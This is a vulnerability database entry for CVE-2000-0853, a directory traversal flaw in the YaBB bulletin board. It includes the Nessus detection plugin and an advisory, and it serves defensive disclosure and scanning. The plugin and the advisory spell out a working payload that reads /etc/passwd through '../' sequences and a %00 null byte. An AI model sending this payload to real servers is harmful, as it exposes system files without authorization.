Vulnerabilities > CVE-2000-0853 - Unspecified vulnerability in Yabb 20000901

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
NONE
Availability impact
NONE
network
low complexity
yabb
nessus
exploit available

Summary

YaBB Bulletin Board 9.1.2000 allows remote attackers to read arbitrary files via a .. (dot dot) attack.

Vulnerable Configurations

Part Description Count
Application
Yabb
1

Exploit-Db

descriptionYaBB 9.1.2000 Arbitrary File Read Vulnerability. CVE-2000-0853. Remote exploit for cgi platform
idEDB-ID:20218
last seen2016-02-02
modified2000-09-10
published2000-09-10
reporterpestilence
sourcehttps://www.exploit-db.com/download/20218/
titleYaBB 9.1.2000 - Arbitrary File Read Vulnerability

Nessus

NASL familyCGI abuses
NASL idYABB.NASL
descriptionThe
last seen2020-06-01
modified2020-06-02
plugin id10512
published2000-09-12
reporterThis script is Copyright (C) 2000-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/10512
titleYaBB YaBB.pl num Parameter Traversal Arbitrary File Access
code
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");

if(description)
{
 script_id(10512);
 script_version ("1.33");
 script_cve_id("CVE-2000-0853");
 script_bugtraq_id(1668);

 script_name(english:"YaBB YaBB.pl num Parameter Traversal Arbitrary File Access");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a CGI script that suffers from an
information disclosure vulnerability." );
 script_set_attribute(attribute:"description", value:
"The 'YaBB.pl' CGI script is installed on the remote host.  This script
has a well-known security flaw that lets an attacker read arbitrary
files with the privileges of the http daemon (usually root or nobody)." );
 script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2000/Sep/213");
 script_set_attribute(attribute:"solution", value:
"Remove 'YaBB.pl' or upgrade to the latest version." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"false");

 script_set_attribute(attribute:"plugin_publication_date", value: "2000/09/12");
 script_set_attribute(attribute:"vuln_publication_date", value: "2000/09/09");
 script_cvs_date("Date: 2018/11/15 20:50:19");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();

 script_summary(english:"Checks for the presence of YaBB.pl");
 script_category(ACT_GATHER_INFO);
 script_copyright(english:"This script is Copyright (C) 2000-2018 Tenable Network Security, Inc.");
 script_family(english:"CGI abuses");
 script_dependencie("http_version.nasl", "web_traversal.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 exit(0);
}

#
# The script code starts here
#

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = get_http_port(default:80, embedded: 0);

if (get_kb_item("www/"+port+"/generic_traversal"))
  exit(0, 'The web server on port '+port+' is vulnerable to web directory traversal.');

if (thorough_tests) dirs = list_uniq(make_list("/yabb", "/forum", cgi_dirs()));
else dirs = make_list(cgi_dirs());

foreach dir (cgi_dirs())
{
 u = string(dir, "/YaBB.pl?board=news&action=display&num=../../../../../../etc/passwd%00");
 r = http_send_recv3(method: "GET", item: u, port:port, exit_on_fail: 1);
 if(egrep(pattern:".*root:.*:0:[01]:.*", string:r[2]))
 {
   if (report_verbosity > 0)
   {
     txt = '\nThis URL returns the content of /etc/passwd :\n' +
     	 build_url(port: port, qs: u) + '\n';
     security_warning(port:port, extra: txt);
   }
   else
     security_warning(port);
   exit(0);
 }
}

exit(0, 'The web server on port '+port+' is not vulnerable.');

Seebug

bulletinFamilyexploit
descriptionBugCVE: CVE-2000-0853 BUGTRAQ: 1668 YaBB.pl是一个基于Web的公告牌脚本程序。YaBB.pl它将公告牌中的文章存放在编号的文本文件中。编号的文件名是在调用YaBB.pl时通过变量num=&lt;file&gt;来指定的。在检索该文件之前,YaBB在&lt;file&gt;后面添加一个后缀.txt。 由于YaBB中的输入合法性检查错误,在&lt;file&gt;中可以指定相对路径。这包括../类型的路径。此外,&lt;file&gt;可以不是数字格式,而且.txt后缀可以通过在&lt;file&gt;后面添加%00来避免。通过在单个请求中使用上述的这些漏洞,恶意用户可以察看Web服务器可以存取的任何文件。 9.1.2000 YaBB ---- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: YaBB Upgrade YaBB 9.11.2000 <a href=http://www.yabb.org/download/yabb.zip target=_blank>http://www.yabb.org/download/yabb.zip</a>
idSSV:4308
last seen2017-11-19
modified2008-10-25
published2008-10-25
reporterRoot
sourcehttps://www.seebug.org/vuldb/ssvid-4308
titleYABB远程文件泄露漏洞